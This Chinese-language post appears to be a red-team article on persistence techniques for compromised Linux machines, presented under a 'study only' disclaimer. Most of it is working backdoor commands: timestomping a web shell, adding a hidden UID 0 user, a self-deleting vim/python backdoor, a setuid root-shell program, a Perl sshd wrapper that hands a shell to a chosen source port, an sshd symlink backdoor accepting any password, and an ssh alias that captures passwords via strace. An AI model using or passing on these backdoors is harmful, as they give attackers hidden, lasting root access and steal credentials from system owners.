【技术分享】红队权限维持方法杂谈

以下内容与测试工具仅限技术交流，严禁用于非法攻击

本次分享分两部分，分别介绍Linux和Windows的权限维持，今天主要介绍Linux的，为了节省时间，这里就选择我平时用的比较多的较为好用的方法来介绍

0X01：Linux篇

这里说的方法都是可以或者说需要配合使用的，具体还要看自己的发散性思维，但是本人（作者BiggieB）从今天开始不再分享任何与思路及实战相关的内容

1. Linux修改文件时间
2. add user
3. vim后门
4. suid
5. SSH
6. 隐藏文件（包括但不限于参数混淆拦截rm）#本文不研究
7. Cron/alias

1.1 顾名思义，如果蓝队根据文件修改时间来判断文件是否为后门，如参考index.php的时间在来看shell.php的时间就可以判断shell.php的生成时间有问题。

解决方法 touch -r index.php shell.php

这就是一个需要配合其他的方法来利用的隐藏手段，不多赘述

2.1 passwd写入

/etc/passwd各部分含义：

用户名：密码：用户ID：组ID：身份描述：用户的家目录：用户登录后所使用的SHELL

/etc/shadow各部分含义：

用户名：密码的MD5加密值：自系统使用以来口令被修改的天数：口令的最小修改间隔：口令更改的周期：口令失效的天数：口令失效以后帐号会被锁定多少天：用户帐号到期时间：保留字段尚未使用

根据格式写入就好，百度上有很详细的教程

2.2在 Unix 体系下，UID 为 0 就是 root 权限。所以渗透的时候可以添加一个 UID 为 0 的用户作为后门

useradd -o -u 0 123

3.1vim 后门

cd /usr/lib/python2.7/site-packages && $(nohup vim -E -c "pyfile dir.py"> /dev/null 2>&1 &) && sleep 2 && rm -f dir.py

dir.py设置成你后门的功能

4.1 suid，简单的讲就是生成一个二进制文件，文件运行的过程中你拥有root权限，你可以以root权限执行任何命令

#vim suid.c#include<stdlib.h>main () {setuid(0);system("/bin/bash");}

然后把他gcc成二进制文件，赋予suid权限，剩下的自己发挥，你甚至可以在web中调用这个文件然后执行系统命令

5.1 wrapper

目标机

cd /usr/sbinmv sshd ../binecho '#!/usr/bin/perl' > sshdecho 'exec "/bin/sh" if (getpeername(STDIN) =~ /^..LF/);' >>sshdecho 'exec {"/usr/bin/sshd"} "/usr/sbin/sshd",@ARGV,' >>sshdchmod u+x sshd/etc/init.d/sshd restart

本机

socat STDIO TCP4:192.168.2.11:22,souceport=19526

解释一下，首先启动sshd，脚本运行到getpeername的时候正则匹配不到，运行下一行，启动真正的sshd，然后建立连接，然后创建一个子进程，子进程回到我们的脚本，重新定向，这样就能获取客户的TCP端口，如果是19526就建立一个shell

5.2 ssh软连接后门

ln -sf /usr/sbin/sshd /tmp/su/tmp/su -oPort=任意端口

PAM进行身份验证时你的配置信息是su，而su只检测uid 0就可认证成功，可以输入任意密码登陆

5.3 公钥免密登陆

ssh-keygen -t rsa //生成公钥

将id_rsa.pub内容放到目标.ssh/authorized_keys里

7.1 Cron，这个很容易被蓝队发现，定时执行任务，不过多介绍

在redis中可以利用这个获得shell

7.2

alias ssh='strace -o /tmp/sshpwd-`date '+%d%h%m%s'`.log -e read,write,connect -s2048 ssh'

好了，文章到这就差不多了，这些都是我平时比较常用的维持权限方法，昨天发个文章有人问我不是弱口令怎么办，今天发完这篇文章我不希望有人问我不是root权限怎么办，谢谢

郑重声明：以上内容仅供学习交流，严禁用于非法交流！！！！！！！